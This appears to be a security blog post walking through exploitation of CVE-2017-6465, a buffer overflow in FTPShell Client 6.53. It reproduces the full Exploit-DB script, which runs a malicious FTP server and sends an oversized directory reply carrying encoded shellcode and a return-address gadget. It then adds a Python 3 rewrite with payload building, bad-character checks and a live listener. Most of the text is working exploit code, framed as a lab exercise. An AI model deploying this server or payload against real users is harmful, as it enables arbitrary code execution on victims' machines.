CVE-2017-6465: FTPShell Client 6.53 Buffer Overflow Exploitation
0x00. Preface
FTPShell is a fairly popular FTP tool for the Windows platform from a foreign vendor. The vulnerable component is the client; at the time of writing the latest client release is 6.53, available from: http://www.ftpshell.com/downloadclient.htm#
Lab environment: VMware + WinXP SP3 EN
Vulnerable app download: http://www.ftpshell.com/downloadclient.htm#
0x01. Exploitation
The buffer overflow is triggered while the client is making its initial, authenticated connection to an FTP server: after the USER/PASS exchange the server answers the client's next command with a reply of the form 220 "<current directory>" is current directory, and a directory name of a few hundred bytes overflows the client's buffer and overwrites the saved return address. The overflow is therefore on the server side of the conversation, so the attacker only needs to run a malicious server and wait for the client to connect. First install FTPShell Client 6.53 in the lab environment.
Here we use the Python script published on Exploit-DB (see references) directly to stand up a malicious FTP server.
```python
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing
#
# Python 2 script: the payload is assembled from str literals with \x escapes
# and sent on the socket as-is.

import socket
import sys

shell=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")
# replace this with shellcode that pops calc.exe (it must stay free of NUL, CR, LF and '"')

port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))   # bind local port 21
    s.listen(5)                  # start listening as the "FTP server"
    print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
    print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
    sys.exit(1)                  # nothing to accept on if the bind failed

# 004b95dc in ftpshell.exe PUSH ESI ; RETN
# Only three bytes of the address are sent; the high 0x00 byte cannot go on the
# wire and is left to the terminating NUL of the copied string. The gadget lives
# in ftpshell.exe itself, so it still works unchanged on WinXP SP3 EN.
eip = "\xdc\x95\x4b"
nops = "\x90"*8
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip   # 400 bytes of filler, then the return address

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))           # USER
    conn.send("331 OK\r\n")
    print(conn.recv(1024))           # PASS
    conn.send('230 OK\r\n')
    print(conn.recv(1024))           # the client's next command
    conn.send('220 "'+buffer+'" is current directory\r\n')   # send the malicious reply
```
Run the script to start the server.
On the victim machine, connect the FTPShell client to the malicious FTP server: the client errors out immediately and the shellcode is executed.
Note: I have not tested this on Win2008 SP2 myself.
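As an added example (not part of the original post or the Exploit-DB script), the same payload construction in Python 3, with the checks worth running before pointing a client at it: that the 3-byte return address really does end in the single NUL the string copy will supply, that the payload contains none of the bytes that would cut the reply short, and a dry run of the login dialog against an in-process fake client so the server logic can be exercised without FTPShell. Only the 400-byte buffer size and the 0x004b95dc address come from the exploit; the bad-character set, the placeholder shellcode (INT3 breakpoints, not a working calc.exe payload), and the USER/PASS/PWD lines the fake client sends are my own assumptions.

```python
import socket
import threading

BUFFER_SIZE = 400        # bytes in front of the saved return address (from the exploit)
RET_ADDR = 0x004B95DC    # PUSH ESI ; RETN in ftpshell.exe (from the exploit)
NOP_COUNT = 8
# Assumed bad characters: the payload travels inside a quoted, CRLF-terminated
# FTP reply and is handled as a NUL-terminated C string.
BAD_CHARS = b"\x00\r\n\""

# Constructed placeholder, NOT a working calc.exe payload: 16 INT3 breakpoints.
PLACEHOLDER_SHELLCODE = b"\xcc" * 16


def ret_bytes(addr):
    """Little-endian address with its trailing 0x00 dropped.

    0x004b95dc is dc 95 4b 00 in memory. Only three bytes are sent; the NUL
    that terminates the copied string lands as the fourth, which is why the
    original exploit sends "\\xdc\\x95\\x4b" and nothing after it.
    """
    raw = addr.to_bytes(4, "little")
    if raw[-1] != 0 or 0 in raw[:-1]:
        raise ValueError("need an address whose only NUL is the top byte")
    return raw[:-1]


def build_payload(shellcode=PLACEHOLDER_SHELLCODE):
    """nops + shellcode + padding up to BUFFER_SIZE, then the 3-byte address."""
    if NOP_COUNT + len(shellcode) > BUFFER_SIZE:
        raise ValueError("shellcode does not fit in %d bytes" % BUFFER_SIZE)
    nops = b"\x90" * NOP_COUNT
    junk = b"A" * (BUFFER_SIZE - NOP_COUNT - len(shellcode))
    return nops + shellcode + junk + ret_bytes(RET_ADDR)


def bad_chars_in(payload, bad=BAD_CHARS):
    """Sorted list of forbidden byte values present in payload ([] means clean)."""
    return sorted({b for b in payload if b in bad})


def malicious_reply(payload):
    """The bogus 'current directory' line the client overflows on."""
    return b'220 "' + payload + b'" is current directory\r\n'


def serve_once(conn, payload):
    """Walk one client through the login dialog, then send the payload.
    Returns the three lines the client sent (USER, PASS, next command)."""
    conn.sendall(b"220 Welcome to your unfriendly FTP server\r\n")
    user = conn.recv(1024)
    conn.sendall(b"331 OK\r\n")
    password = conn.recv(1024)
    conn.sendall(b"230 OK\r\n")
    following = conn.recv(1024)
    conn.sendall(malicious_reply(payload))
    return user, password, following


def dry_run(payload):
    """Run serve_once against an in-process fake client over a socketpair
    (no real FTPShell involved) and return the final line the client saw."""
    srv, cli = socket.socketpair()
    t = threading.Thread(target=serve_once, args=(srv, payload))
    t.start()
    cli.recv(1024)                                  # 220 banner
    cli.sendall(b"USER anonymous\r\n")              # constructed client traffic
    cli.recv(1024)                                  # 331
    cli.sendall(b"PASS test@example.com\r\n")
    cli.recv(1024)                                  # 230
    cli.sendall(b"PWD\r\n")
    final = b""
    while not final.endswith(b"\r\n"):              # the oversized reply
        final += cli.recv(4096)
    t.join()
    srv.close()
    cli.close()
    return final


def serve_forever(payload, port=21):
    """Real listener, equivalent to the original script's main loop."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    while True:
        conn, _ = s.accept()
        with conn:
            print(serve_once(conn, payload))


if __name__ == "__main__":
    p = build_payload()
    if bad_chars_in(p):
        raise SystemExit("payload contains bad bytes: %r" % bad_chars_in(p))
    print("payload %d bytes, dry run returned %d bytes" % (len(p), len(dry_run(p))))
```

With the original 343-byte encoded shellcode passed to build_payload() the result is the same 403-byte buffer the Exploit-DB script sends; the bad-character check is the reason that payload is alphanumeric-encoded rather than raw. Swap serve_forever() in for dry_run() under __main__ to listen on port 21 for a real client.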
0x02. References
Exploit-DB: https://www.exploit-db.com/exploits/41511/